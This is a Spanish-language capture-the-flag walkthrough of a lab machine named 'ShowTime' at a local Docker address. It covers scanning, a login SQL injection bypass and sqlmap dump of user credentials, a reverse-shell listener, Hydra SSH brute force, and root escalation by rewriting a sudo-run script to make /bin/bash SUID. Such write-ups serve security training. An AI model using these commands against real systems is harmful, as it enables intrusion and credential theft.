ShowTime

✍️ Autor: maciiii___ 🔍 Dificultad: Fácil 📅 Fecha de creación: 24/07/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web del Casino.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,doc,html,txt

Hacemos una inyección SQL básica en el directorio /login_page.

' OR '1'='1

Realizamos este comando para identificar bases de datos.

sqlmap -u http://172.17.0.2/login_page/index.php --forms --dbs --batch

Ahora para ver las tablas dentro de la base de datos de users.

sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users --tables --batch

Ahora vemos las columnas dentro de la tabla de usuarios.

sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios --columns --batch

Ahora vemos la información que hay guardada en los registros.

sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios -C password,id,username --dump --batch

🚀 EXPLOTACIÓN

Con el tercer usuario nos logueamos y nos sale un panel de administración en el que podemos ejecutar un comando en Python.

Nos ponemos en escucha para recibir la Reverse Shell.

nc -nlvp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos con SUDO.

En el directorio /tmp hay una archivo del texto oculto.

Creamos un diccionario pasando de mayúsculas a minúsculas para realizar la fuerza bruta.

tr '[:upper:]' '[:lower:]' < trucos.txt > diccionario.txt

Realizamos el ataque de fuerza bruta mediante Hydra.

hydra -l joe -P diccionario.txt ssh://172.17.0.2 -t 64

Nos logueamos con esas credenciales encontradas.

ssh joe@172.17.0.2

Tenemos permisos SUDO con posh por lo que miramos esta página para ver como escalar privilegios.

sudo -u luciano /bin/posh

En el directorio de luciano principal encontramos un script que no podemos editar con nano ni con vim por lo que lo hacemos con echo.

echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > script.sh

Ahora ejecutamos el script para ser root.

sudo -u root /bin/bash /home/luciano/script.sh 

Ejecutamos.

bash -p